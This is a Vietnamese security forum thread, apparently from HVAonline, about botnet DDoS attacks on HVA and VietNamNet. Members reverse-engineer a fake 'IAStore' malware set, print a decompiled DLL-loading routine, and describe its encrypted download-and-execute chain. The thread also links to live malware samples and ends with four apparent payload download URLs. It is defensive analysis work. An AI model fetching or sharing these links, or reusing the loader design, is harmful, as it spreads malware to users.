http://www.mediafire.com/download.php?sib1p2b2m2g611o ]]>
/hvaonline/posts/list/39641.html#245999 /hvaonline/posts/list/39641.html#245999 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246000 /hvaonline/posts/list/39641.html#246000 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

mrquytk93 wrote:
Sau vài lần lướt web thì thấy topic này có vẻ rất " HOT " Chuyển sang chủ để chính luôn, là HVA có biện pháp gì mới để chống hay không Chứ phân tích cái này rồi cuối cùng vẫn bị DIE thì hơi chán Khoảng đầu tháng 9 mình muốn HVA nghiên cứu sâu hơn về synflood Vì hiện tại với synflood mình có thể cho HVA die bất cứ lúc nào ------------------------------------------------------------------------- Mr.Quy CBG.No1 ADMIN - ATH  
Nghĩ cũng buồn. Con ếch con ngồi đáy giếng hênh hoang với mấy con nòng nọc quen rồi =)) giờ vừa hóng hớt lên bờ tý thì lại định mang mấy cái bài ộp oạp ra đây =)). cậu không cần phải khoe admin cái ATH hay là cái CBG nhà cậu ra. ở hva cậu chả là cái gì cả. còn muốn vài cái code đểu synflood cho mấy đứa học lập trình 3 tháng nó code ý thì về cái 4rum nhà cậu mà nói với mấy con nòng nọc. cậu làm luôn tháng 8 đi. không cần đợi đến tháng 9 đâu :|. ngày xưa không biết cái thời người ta làm mấy cái trò đấy chắc là cậu còn "chùi đít chưa sạch". có 1 gợi ý là muốn người khác nghĩ mình giỏi thì cách hay nhất là hãy "chém gió" trước 1 đám người ng* hơn mình :| cậu chọn nhầm chỗ rồi #:S

mv1098 wrote:
mrquytk93 này mình nhớ không nhầm thì cũng nổi tiếng với vụ botnet qua IRC mà bị mấy bro an ninh mạng mời tới uống trà đá rồi.  
mấy con gà mới bị mời thôi mà bạn. chứ pro như các anh STL thì có khi an ninh mạng cũng sợ mấy anh ý hack ý chứ. chắc là cách đấy 5 năm nếu thấy cậu này hô thế mình cũng tung hô cậu ta lắm đấy :( tiếc là cậu ta sinh muộn 5 năm]]>
/hvaonline/posts/list/39641.html#246006 /hvaonline/posts/list/39641.html#246006 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

mrquytk93 wrote:
Sau vài lần lướt web thì thấy topic này có vẻ rất " HOT " Chuyển sang chủ để chính luôn, là HVA có biện pháp gì mới để chống hay không Chứ phân tích cái này rồi cuối cùng vẫn bị DIE thì hơi chán Khoảng đầu tháng 9 mình muốn HVA nghiên cứu sâu hơn về synflood Vì hiện tại với synflood mình có thể cho HVA die bất cứ lúc nào ------------------------------------------------------------------------- Mr.Quy CBG.No1 ADMIN - ATH  
Mình theo dỗi topic này từ những ngày đầu.Thấy khâm phục những gì mà TQN cũng như conmale,PXMMRF và các thành viên HVA khác đã làm.Để cho chúng ta ở đây hiểu rõ hơn bản chất của sự việc. Mr.Quy bạn quá kêu ngoạo về bản thân mình rồi đó.Chỉ giỏi hack local,UG,chọc phá site người khác, viết mấy con bot dùng autoit điều khiển qua IRC , web gì của bạn chẳng khác nào scriptkid.Không biết có viết được không hay dùng lại của người khác :) Lần trước Deface site của mình còn xoá cả data cũng may là bên mình có backup.Xong rồi còn giở trò botnet nữa chứ.Chẳng có gì hay ho đâu nhé.Xin lỗi các thành viên HVA mình đã làm loãng chủ đề nhưng mình muốn lên án hành động thiếu ý thức của MR.Quy vì cộng đồng IT VN.]]>
/hvaonline/posts/list/39641.html#246007 /hvaonline/posts/list/39641.html#246007 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Analysis of the file(s) in Submission ID MMPC11082667068256 is now complete. This is the final email that you will receive regarding this submission. The Microsoft Malware Protection Center (MMPC) has investigated the following file(s) which we received on 8/25/2011 9:11:19 PM Pacific Time. Below is the determination for your submission. ======== Submission ID MMPC11082667068256 Submitted Files ============================================= IAStore_26_08_2011.zip [Not Malware] +---SmartPin.dll [Not Malware] +---IAStorUIHelper.dll [Not Malware] +---SysInftLib.dll [Not Malware] +---IAStorCommon.dll [Not Malware] +---IAStorDataMgrSvc.exe [Not Malware] +---IAStorDataMgr.dll [Not Malware] Your submission was scanned using antimalware definition version 1.111.798.0. ======== The detections listed above are included in the latest pre-release definition available for download. For more information please visit the pre-release definition update download page available at: http://www.microsoft.com/security/portal/Shared/PreReleaseSignatures.aspx Alternatively, detections listed above will be available for users who subscribe to the automatic definition update mechanism in the next regularly scheduled release, as well as users who choose to manually update their definition library available via the MMPC Portal available on: http://www.microsoft.com/security/portal/Definitions/ADL.aspx If you have questions relating to this submission please contact mailto:mmpcres@microsoft.com and reference your submission ID. We would like to find ways to improve our service to you. Please take a few minutes and fill out our short customer survey for this incident. You can navigate to our short (6 question) survey here: http://www.zoomerang.com/Survey/WEB22CHRC7QCL5/ ============================================= Additional Help For customers who do not have an antivirus solution, Microsoft Security Essentials can be downloaded at no charge here: http://www.microsoft.com/security_essentials/ For more information about updating definitions and answers to other questions, visit the following link: http://www.microsoft.com/security/portal/Shared/Help.aspx#new_defns If you need immediate assistance and information on best practices for removing malware in your environment, additional support options are available at the following websites: For IT Professionals - http://support.microsoft.com/gp/securityitpro For Home Users - http://support.microsoft.com/default.aspx?pr=securityhome Thank you, Microsoft Malware Protection Center  ]]> /hvaonline/posts/list/39641.html#246008 /hvaonline/posts/list/39641.html#246008 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Kinh thật, code khá lắm, 1 file exe đăng ký run như 1 service, 5 file dll, mỗi thằng 1 nhiệm vụ khác nhau. Thằng làm trách nhiệm download là thằng IAStoreUIHelp.dll. Tất cả chúng phối hợp nhuần nhuyễn với nhau. Bạn 1visao có nhớ là tại sao, khi nào, download cái gì mà máy trên công ty này của bạn bị dính đám mạo danh IAStore này không ? Bà con ơi, tiếp tục up mẫu thôi. Toàn bộ đống mạo danh IAStore này em đã up ở đây: http://www.mediafire.com/?wv13bdoc4g8f905 Bà con phụ một tay up mẫu cho AVs nhé. Giờ em đi ăn sáng, uống cafe lấy sức đã, tối qua thức tới 3h. Ngày nay lại ngồi lỳ ở nhà nữa rồi, cúp đt thôi. À sẵn tiện nhờ bà con tư vấn cái: vốn em rất lạc hậu về công nghệ, cái máy em đang dùng đây đã gần 10 năm rồi, mua từ 2002, giờ nó tàn và cùi bắp lắm, mới thay bộ nguồn mà ưng là nó restart cái bụp (xe em đi đã 12 năm rồi thì sao, từ thời còn sv hàn vi). Em "phải" mua 1 cái laptop thôi, đi đâu mang theo, chớ ngồi ở nhà hoài bỏ công bỏ việc hết. Bà con biết chổ nào bán máy laptop xài được, màn hình to to, bàn phím bự bự, chất lượng, giá cã phù hợp giới thiệu em một cái. Không cần mạnh đâu, chỉ cần lướt web, vào HVA post bài, theo dõi giá vàng và RCE, code bậy bạ thôi. Cảm ơn trước nhé ! 
Bác TQN ơi bác hình như không có làm về IT thì phải mà bác lại thừa kiến thức và trình độ để làm IT hay là bác đổi cho e tí kiến thức của bác rồi e đổi lap cho bác để e đi làm cho đỡ vất vả ko cứ đi phụ hồ thì mệt lắm :d]]>
/hvaonline/posts/list/39641.html#246016 /hvaonline/posts/list/39641.html#246016 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Chiều nay, nghỉ RCE, đi nhậu với thằng em rể. Vài lời với mấy anh em stl: Tôi, anh em HVA này, và các bạn, toàn là người Việt thôi. Tại sao phải đấu đá với nhau làm gì ???? Em biết mấy anh cũng có nổi khổ của mấy anh, đã là sống chết theo lệnh rồi thì mấy anh, cũng chỉ là những người làm công ăn lương thôi, bị lệnh từ sếp ở trên ban xuống, phải gồng mình mà cố gắng lỳ lợm, trơ gan ra để hoàn thành lệnh sếp giao. Nhưng em cũng thừa biết mấy anh cũng phải miễn cưỡng mà làm thôi, vì miếng cơm manh áo, tiền bạc, gạo tiền, vợ con, gia đình thôi, phải không mấy anh em stl. Mấy anh em cũng giỏi lắm, em phải khen, rất giỏi (em chưa từng khen ai cả trong IT). Nhưng mấy anh ơi, quay đầu là bờ, mình phải cam tâm làm tay sai cho tàu khựa, bán nước, phản động, hại đồng loại của mình tới bao giờ nữa ??? Em mong mấy anh hảy bình tâm suy nghĩ lại đi ! Tới chiều nay, em chợt nghĩ lại, em tự nhiên thấy thương mấy anh quá, cùng là người Việt, cùng là dân IT với nhau, chỉ vì mấy thằng sếp bán nước mà anh em ta phải quay ra đấu đá lẫn nhau, truy cùng đuổi tận. Nếu lỡ có chuyện gì, thì chỉ mấy anh em ta là con tốt thí mạng, vắt chanh bỏ vỏ mà thôi. Chỉ nên chữi mấy thằng tàu nham hiểm, thâm độc đang nắm đầu mấy sếp của tụi anh thôi. Vài lời chân tình, mong mấy anh em stl hiểu giùm tôi. Lần này, tôi nói rất chân tình, mong mấy anh em stl hiểu ! Mấy anh em nên nhớ, chúng ta cùng là người Việt, cùng nòi giống con Rồng cháu Tiên nhé. Hảy suy nghĩ lại đi, mấy anh em stl của tôi ơi ! Hảy cùng nhau phản đối, kiến nghị, đình công, biểu tình... lên mấy sếp của mấy anh, dừng ngay các hành động phạm pháp, xấu xa, đồi bại này lại. Em biết, chính quyền nào cũng có những tổ chức như mấy anh, nhưng đừng làm quá lắm. Mục tiêu "ổn định chính trị" của mấy anh, em công nhận là đúng, nhưng đừng dùng những hành động phạm pháp, đê hèn, xấu xa như vậy. Nếu không vì những hành động ấy, đường anh anh đi, đường em em đi. Em nói vậy mấy anh stl có hiểu không ? 
Tội nghiệp TQN. Trên thế gian này có ba loại người: 1. Loại có trí tuệ và có liêm sỉ. 2. Loại không có trí tuệ nhưng có liêm sỉ. 3. Loại có trí tuệ nhưng không có liêm sỉ. Những con người có liêm sỉ thường không cần được khuyên bảo hoặc chỉ cần nói một lần là xong. Riêng với những con người không có liêm sỉ thì có chẻ đầu ra đổ vào hàng xe tải lời khuyên cũng vô ích bởi vì thiểu liêm sỉ thì thiếu chất xúc tác để dung nạp lẽ phải, để tiếp nhận cái thiện. Huống hồ chi, "sống chết theo lệnh" thì lại càng khó mà nói chuyện phải quấy. Một vết thương ung mủ không mổ xẻ ra để rửa cho sạch vi trùng mà che đậy để "ổn định" thì chẳng mấy chốc nó sẽ lan ra và sẽ làm hoại thư cả một cơ thể. Trên thế gian này, từ cổ chí kim, sự thật luôn luôn tồn tại.]]>
/hvaonline/posts/list/39641.html#246031 /hvaonline/posts/list/39641.html#246031 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246032 /hvaonline/posts/list/39641.html#246032 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
http://www.mediafire.com/download.php?ns3esc307tjczkc]]>
/hvaonline/posts/list/39641.html#246033 /hvaonline/posts/list/39641.html#246033 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246036 /hvaonline/posts/list/39641.html#246036 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

tranhuanltv wrote:
IAStore_26_08_2011.zip mẫu của anh TQN gửi Avira cũng cho là sạch luôn :D 
Ủa sao kì vậy ta? Theo như những comment ở trang trước thì mấy file này đã bị avira lụm trước đây vài ngày rồi mà ?]]>
/hvaonline/posts/list/39641.html#246040 /hvaonline/posts/list/39641.html#246040 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

TQN wrote:
Chiều nay, nghỉ RCE, đi nhậu với thằng em rể. Vài lời với mấy anh em stl: Tôi, anh em HVA này, và các bạn, toàn là người Việt thôi. Tại sao phải đấu đá với nhau làm gì ???? Em biết mấy anh cũng có nổi khổ của mấy anh, đã là sống chết theo lệnh rồi thì mấy anh, cũng chỉ là những người làm công ăn lương thôi, bị lệnh từ sếp ở trên ban xuống, phải gồng mình mà cố gắng lỳ lợm, trơ gan ra để hoàn thành lệnh sếp giao. Nhưng em cũng thừa biết mấy anh cũng phải miễn cưỡng mà làm thôi, vì miếng cơm manh áo, tiền bạc, gạo tiền, vợ con, gia đình thôi, phải không mấy anh em stl. Mấy anh em cũng giỏi lắm, em phải khen, rất giỏi (em chưa từng khen ai cả trong IT). Nhưng mấy anh ơi, quay đầu là bờ, mình phải cam tâm làm tay sai cho tàu khựa, bán nước, phản động, hại đồng loại của mình tới bao giờ nữa ??? Em mong mấy anh hảy bình tâm suy nghĩ lại đi ! Tới chiều nay, em chợt nghĩ lại, em tự nhiên thấy thương mấy anh quá, cùng là người Việt, cùng là dân IT với nhau, chỉ vì mấy thằng sếp bán nước mà anh em ta phải quay ra đấu đá lẫn nhau, truy cùng đuổi tận. Nếu lỡ có chuyện gì, thì chỉ mấy anh em ta là con tốt thí mạng, vắt chanh bỏ vỏ mà thôi. Chỉ nên chữi mấy thằng tàu nham hiểm, thâm độc đang nắm đầu mấy sếp của tụi anh thôi. Vài lời chân tình, mong mấy anh em stl hiểu giùm tôi. Lần này, tôi nói rất chân tình, mong mấy anh em stl hiểu ! Mấy anh em nên nhớ, chúng ta cùng là người Việt, cùng nòi giống con Rồng cháu Tiên nhé. Hảy suy nghĩ lại đi, mấy anh em stl của tôi ơi ! Hảy cùng nhau phản đối, kiến nghị, đình công, biểu tình... lên mấy sếp của mấy anh, dừng ngay các hành động phạm pháp, xấu xa, đồi bại này lại. Em biết, chính quyền nào cũng có những tổ chức như mấy anh, nhưng đừng làm quá lắm. Mục tiêu "ổn định chính trị" của mấy anh, em công nhận là đúng, nhưng đừng dùng những hành động phạm pháp, đê hèn, xấu xa như vậy. Nếu không vì những hành động ấy, đường anh anh đi, đường em em đi. Em nói vậy mấy anh stl có hiểu không ? 
Tội nghiệp TQN. Trên thế gian này có ba loại người: 1. Loại có trí tuệ và có liêm sỉ. 2. Loại không có trí tuệ nhưng có liêm sỉ. 3. Loại có trí tuệ nhưng không có liêm sỉ. Những con người có liêm sỉ thường không cần được khuyên bảo hoặc chỉ cần nói một lần là xong. Riêng với những con người không có liêm sỉ thì có chẻ đầu ra đổ vào hàng xe tải lời khuyên cũng vô ích bởi vì thiểu liêm sỉ thì thiếu chất xúc tác để dung nạp lẽ phải, để tiếp nhận cái thiện. Huống hồ chi, "sống chết theo lệnh" thì lại càng khó mà nói chuyện phải quấy. Một vết thương ung mủ không mổ xẻ ra để rửa cho sạch vi trùng mà che đậy để "ổn định" thì chẳng mấy chốc nó sẽ lan ra và sẽ làm hoại thư cả một cơ thể. Trên thế gian này, từ cổ chí kim, sự thật luôn luôn tồn tại. 
Chào các anh em trên HVA, chào anh TQN, anh PXMMRF, anh conmale và các anh em trong BQT HVA , em theo dõi quá trình phân tích mẫu của các anh từ rất lâu rồi. Từ lúc anh TQN còn "RCE đám virus của STL", lúc đó em cũng chỉ tò mò xem cho biết. Nhưng dần dần thì sự việc lại càng mở rộng. Ngày nào em cũng lên HVA để đọc những phân tích của các anh, những comment của các mem (em đang học an ninh mạng nhưng còn gà con nên ko dám lên tiếng :( ). Và em nghĩ cũng có nhiều anh em có sở thích như em, chỉ đọc mà ko nói câu nào.! Em nghĩ các anh cũng mệt mỏi với việc này lắm rồi, nếu là em thì em cũng sẽ rất mệt mỏi. Em thật sự khâm phục các anh, niềm đam mê IT trong các anh rất lớn thì các anh mới có thể theo đuổi đến lúc này. Em rất muốn chia sẻ cùng các anh nhưng ko biết làm sao vì trình độ em còn kém lắm. Lời cuối em xin chân thành cảm ơn các anh, anh TQN, anh PXMMRF, anh conmale và các anh em HVA. Chúc các anh luôn khoẻ mạnh.]]>
/hvaonline/posts/list/39641.html#246041 /hvaonline/posts/list/39641.html#246041 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246042 /hvaonline/posts/list/39641.html#246042 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
Tội nghiệp TQN. Trên thế gian này có ba loại người: 1. Loại có trí tuệ và có liêm sỉ. 2. Loại không có trí tuệ nhưng có liêm sỉ. 3. Loại có trí tuệ nhưng không có liêm sỉ. Những con người có liêm sỉ thường không cần được khuyên bảo hoặc chỉ cần nói một lần là xong. Riêng với những con người không có liêm sỉ thì có chẻ đầu ra đổ vào hàng xe tải lời khuyên cũng vô ích bởi vì thiểu liêm sỉ thì thiếu chất xúc tác để dung nạp lẽ phải, để tiếp nhận cái thiện. Huống hồ chi, "sống chết theo lệnh" thì lại càng khó mà nói chuyện phải quấy. Một vết thương ung mủ không mổ xẻ ra để rửa cho sạch vi trùng mà che đậy để "ổn định" thì chẳng mấy chốc nó sẽ lan ra và sẽ làm hoại thư cả một cơ thể. Trên thế gian này, từ cổ chí kim, sự thật luôn luôn tồn tại. 
Em xin bổ sung : 4. Loại không có trí tuệ và không có liêm sỉ. và "Trên thế gian này, từ cổ chí kim, sự thật luôn luôn tồn tại và chỉ có một mà thôi"]]>
/hvaonline/posts/list/39641.html#246054 /hvaonline/posts/list/39641.html#246054 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246062 /hvaonline/posts/list/39641.html#246062 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246065 /hvaonline/posts/list/39641.html#246065 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246089 /hvaonline/posts/list/39641.html#246089 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246097 /hvaonline/posts/list/39641.html#246097 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
http://hanviquan.forumvi.com/t370-topic
trong đó chứa link tới file unikey trên mediafire (hình như đa số virus dc up lên mediafire) --> Code:
http://www.mediafire.com/?k1i01ry314xb97h
file này em chỉ up lên thử virustotal thì 4 thằng detect là malware. Các anh ngó sơ xem chúng có thuộc variant của nào của STL hay không thì theo em thấy như các anh nói trong HVA, vẫn tồn tại một số mẫu botnet khác nữa. Khi thử post cái từ khóa "http://www.mediafire.com/?k1i01ry314xb97h" lên google thì hiện tại có những 79 trang link đến cái file virus này. Trong đó có cả 1 trang diễn đàn của bkav. Chúc các anh chân cứng đá mềm.]]>
/hvaonline/posts/list/39641.html#246112 /hvaonline/posts/list/39641.html#246112 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246117 /hvaonline/posts/list/39641.html#246117 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246118 /hvaonline/posts/list/39641.html#246118 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

o.O.o wrote:
Sáng em vào thử vietnamnet.vn (29-08-2011 7:22 PM) tốc độ truy cập rất nhanh, gõ enter xong là ra ngay, chắc đang ngưng ddos rồi 
Còn tớ thì thử 3 IP từ 3 quốc gia Úc, Nhật, Đức để truy cập vietnamnet hoàn toàn không được. Có lẽ vietnamnet block trọn bộ IP nước ngoài hay sao đây.]]>
/hvaonline/posts/list/39641.html#246119 /hvaonline/posts/list/39641.html#246119 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
Còn tớ thì thử 3 IP từ 3 quốc gia Úc, Nhật, Đức để truy cập vietnamnet hoàn toàn không được. Có lẽ vietnamnet block trọn bộ IP nước ngoài hay sao đây. 
Có vẻ là Vietnamnet block hết mạng ngoài VN hay sao ấy, mình cũng không vào được.]]>
/hvaonline/posts/list/39641.html#246120 /hvaonline/posts/list/39641.html#246120 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246123 /hvaonline/posts/list/39641.html#246123 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
Sáng nay vô thử vietnamnet thì vẫn tràn ngập trong "biển lửa". Tất cả các trang mạng thuộc vietnamnet đều chập chờn và đa số là bị lỗi 404. Hôm trước có vô được nhưng cực kỳ chậm. Điều này chứng tỏ cho đến nay vietnamnet vẫn còn bị tấn công nặng nề, thậm chí còn nặng nề hơn mấy hôm trước. stl botnet vẫn tiếp tục "crawl" (dựa thông tin lấy từ con vmware đang chạy thử) và dường như vietnamnet ứng dụng javascript để wwwect nhưng chỉ thuần tuý wwwecting nhưng không kiểm soát cụ thể cái gì được wwwect và cái gì không được wwwect. Hơn nữa, botnet của stl đập thẳng vô những trang chính của của vietnamnet và sau đó tiếp tục "crawl" thì không có cách gì đỡ nổi. Về mặt pháp lý, lẽ nào một trang web lớn như vietnamnet, một trong những cơ quan ngôn luận của nhà nước mà vẫn bó tay thúc thủ? Thông tin reverse đã được anh em ở HVA công bố quá đầy đủ. Các cơ quan chức năng thừa sức mạnh để làm việc xuyên qua những channel chính thức để thộp cổ bọn tội phạm này. Nếu chuyện tường lửa đã được áp dụng để cản đến mức độ từng blog mà không thể dùng tường lửa để cản các master bots thì đây quả là chuyện kỳ lạ. 
Thực ra nó lạ mà không lạ, lạ vì bị "đánh đập bầm dập", biết thằng nào đánh mà không dám lên tiếng. Không lạ vì nó là thực tế của nhiều sự việc ở Vietnam hiện nay. :( Việc Vietnamnet bị DDOS nặng nề, chỉ cần họ HO một tiếng thôi (hướng dẫn cách thức kiểm tra máy có virus hoặc 1 cái tool remove các virus này) thì chắc sức lan toả tới cộng đồng sẽ rất lớn. Mấy chục báo mạng đưa tin lại, thì virus này sẽ bị tiêu diệt hoặc sống lay lắt mà thôi. :D Tốt hơn hết là họ nên có một chuyên mục phòng chống VIRUS, được thế thì bà con Việt mới được nhờ. Nhưng nếu lập ra chuyên mục này, khéo "họ" lại giết chính gà nhà của mình thì mệt =)) ]]>
/hvaonline/posts/list/39641.html#246125 /hvaonline/posts/list/39641.html#246125 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Báo điện tử VietNamnet bị tấn công 16/08/2011 0:09 Từ khoảng 10 giờ sáng hôm qua 15.8, việc truy cập vào báo điện tử VietNamnet (VNN) tại địa chỉ vietnamnet.vn liên tục bị nghẽn. Phản hồi từ máy chủ của VNN rất chậm, lúc được lúc không và liên tục hiện ra thông báo “Server is too busy” (Máy chủ quá tải). Đến chiều tối cùng ngày, việc truy cập vẫn rất khó khăn. Ông Bùi Bình Minh, trợ lý Tổng biên tập VNN về công nghệ thông tin xác nhận, báo điện tử này bị tấn công DDOS (từ chối dịch vụ) ở cấp độ nhẹ. “Có khả năng đây là các tàn dư của các mạng botnet cũ được lập trình từ trước đó đến “hẹn” lại phát động tấn công chứ không hẳn là tấn công có chủ ý. Mức độ tấn công cũng không lớn”, ông Minh cho biết. Trường Sơn http://www.thanhnien.com.vn/Pages/20110816/Bao-dien-tu-VietNamnet-bi-tan-cong.aspx   Câu chuyện bi hài mà các bác không dám nói thật ]]> /hvaonline/posts/list/39641.html#246131 /hvaonline/posts/list/39641.html#246131 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246139 /hvaonline/posts/list/39641.html#246139 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246150 /hvaonline/posts/list/39641.html#246150 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246151 /hvaonline/posts/list/39641.html#246151 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246176 /hvaonline/posts/list/39641.html#246176 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.mediafire.com/?ioyq3101k2l1rhm Chức năng là monit đống links trong file sotilon.txt, nếu sau có thêm link khác thì cứ add thêm vào dòng cuối. Nếu lần download sau có sự thay đổi sẽ ghi ngày giờ ra log file log.txt Bạn nào dùng windows thì lập cho file stl_mon.exe 1 cái schedule vài phút run 1 lần cho nó compare. Mình chưa test kĩ được, nếu ai dùng mà thấy có lỗi gì pm mình mình sửa :^) Trước cứ tưởng autoit chỉ để viết virus :P //tí quên, có 3 folder trong đó thì đừng del cái nào đi nhé các bạn. 1 cái để chứa file download lần trước, 1 cái để chứa file tạm cho việc compare, 1 cái để move file thay đổi vào.]]> /hvaonline/posts/list/39641.html#246177 /hvaonline/posts/list/39641.html#246177 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246184 /hvaonline/posts/list/39641.html#246184 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. https://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=13A47553-F32A-4AC3-8497-E5C314EEE27E Rút kinh nghiệm, thay vì các bạn up các mẫu đang DDOS Vietnamnet cho các AVs bằng các website của họ, nếu kết quả của hệ thống phân tích tự động của họ trả về là clean, các bạn nên mail thẳng tới mail support của họ. Họ sẽ cử nhân viên manual analysis. Ví dụ, vừa qua, một guru khét tiếng của Kaspersky (kẻ mà hacker Nga rất ghét, rất nổi tiếng về malware analysis) đã có mail hồi báo cho tôi về các mẫu fake Sanboxie, fake Itunes, IAStore, thông báo kết quả manual analysis của ông ấy, và không thằng nào lọt sổ cả ;) Ông ta có nói họ đang theo dõi hệ thống botnet này. Tôi cũng đã gởi Fake ITunes và Fake IAStore cho bạn tôi ở Avira và MS. ]]> /hvaonline/posts/list/39641.html#246185 /hvaonline/posts/list/39641.html#246185 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

vndncn wrote:
Hi anh canh_nguyen: Em chạy file stl_mon.exe, MSE báo là k113[1].css là trojan. Sao vậy anh? Em không biết dán hình MSE báo là tronjan lên đây bắng cách nào, để anh và mọi người xem.  
Báo trojan là đúng rồi, MSE phát hiện thì càng tốt chứ sao.]]>
/hvaonline/posts/list/39641.html#246186 /hvaonline/posts/list/39641.html#246186 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.cryptopp.com, bản mới nhất để làm nhiệm vụ encrypt các link download và để giải mã file malware download về. Và lại dùng toàn CString class của ATLMFC VC++ 2010 để làm các nhiệm vụ thao tác chuỗi (string). Static analysis hoàn toàn rất tốn công sức, vì vậy tôi chỉ tập trung vào debug là chính. Con IAStore này cũng mắc lỗi như tôi đã nói lúc trước: 1. Vẫn tìm nhiều cách mã hoá các string quan trọng, nhưng tới thời điểm call API của socket API thì vẫn phải lòi ra clear text. 2. Vẫn dùng cách: giã mã file malware xong, ghi xuống %Temp% rồi CreateProcessA/W, cập nhật nó xong rồi nó mới bị xoá : DeleteFileA, DeleteFileW. Một ít miêu tã: 1. IAStorUIHelper.dll làm nhiệm vụ download, dùng pure socket API, export ra 3 hàm mạo danh. Nhưng 3 hàm này phải được bên ngoài gọi và truyền tham số vào. Hàm InvokeEx là hàm khởi tạo Windows Socket, hàm GetCLSID chính là hàm download. Nó chỉ build trong ruột User-Agent và HTTP Request string, còn toàn bộ nhận từ input parameter (tham số truyền vào) từ caller (hàm gọi). Hàm QueryInterface trả toàn bộ nội dung đã download về caller. 2. IAStorDataMgr.dll chỉ export 1 hàm duy nhất, GetInstance, cũng nhận tham số từ caller. Hàm GetInstance sẽ call và truyền tham số cho 2 hàm: GetCLSID và QueryInterface của IAStorUIHelper.dll. Hàm GetInstance parse và giãi mã bước 1 nội dung lấy về, trả về caller. 3. IAStorDataMgrSvc sẽ kiểm tra có đủ và đúng bộ dlls của nó hay không: Code:
bool __cdecl LoadDlls()
{
    HMODULE hIAStorCommon; // eax@1
    HMODULE hIAStorUIHelper; // eax@3
    HMODULE hIAStorDataMgr; // eax@5
    HMODULE hSmartPin; // eax@7
    HMODULE hSysInftLib; // eax@9

    hIAStorCommon = LoadLibraryW(L"IAStorCommon.dll");
    if ( hIAStorCommon )
        g_pfnGetFrameInfo = GetProcAddress(hIAStorCommon, "GetFrameInfo");
    hIAStorUIHelper = LoadLibraryW(L"IAStorUIHelper.dll");
    if ( hIAStorUIHelper )
    {
        g_pfnGetCLSID = GetProcAddress(hIAStorUIHelper, "GetCLSID");
        g_pfnQueryInterface = GetProcAddress(v2, "QueryInterface");
        g_pfnInvokeEx = GetProcAddress(v2, "InvokeEx");
    }
    hIAStorDataMgr = LoadLibraryW(L"IAStorDataMgr.dll");
    if ( hIAStorDataMgr )
        g_pfnGetInstance = GetProcAddress(hIAStorDataMgr, "GetInstance");
    hSmartPin = LoadLibraryW(L"SmartPin.dll");
    if ( hSmartPin )
        g_pfnEnumSataPort = GetProcAddress(hSmartPin, "EnumSataPort");
    hSysInftLib = LoadLibraryW(L"SysInftLib.dll");
    if ( hSysInftLib )
        g_pfnWaitForSignal = GetProcAddress(hSysInftLib, "WaitForSignal");
    return g_pfnGetFrameInfo
        && g_pfnGetCLSID
        && g_pfnQueryInterface
        && g_pfnInvokeEx
        && g_pfnGetInstance
        && g_pfnEnumSataPort
        && g_pfnWaitForSignal;
}
Nếu return FALSE, nó sẽ exit. Còn nếu TRUE, nó bắt đầu làm việc download nhờ các thread và vòng loop vô tận. EXE call InvokeEx của IAStorUIHelper.dll để khởi tạo Windows socket. Sau đó giải mã 4 link download dùng DES algorithm, truyền cho GetInstance, lấy kết quả trả về, rồi lại giãi mã một lần nữa để extract được file PE malware, ghi xuống %temp%, CreateProcess nó, wait xong delete. ]]>
/hvaonline/posts/list/39641.html#246189 /hvaonline/posts/list/39641.html#246189 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.
Vậy xin hỏi cụ thể em phải làm j để giúp các anh lấy mẫu? PS: e đang ở trường.]]>
/hvaonline/posts/list/39641.html#246190 /hvaonline/posts/list/39641.html#246190 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
http://direct.fqin.net/codec.zip
 http://easy.lixns.com/codec.zip
 http://find.laxt.net/codec.zip
 http://second.xzin.net/codec.zip

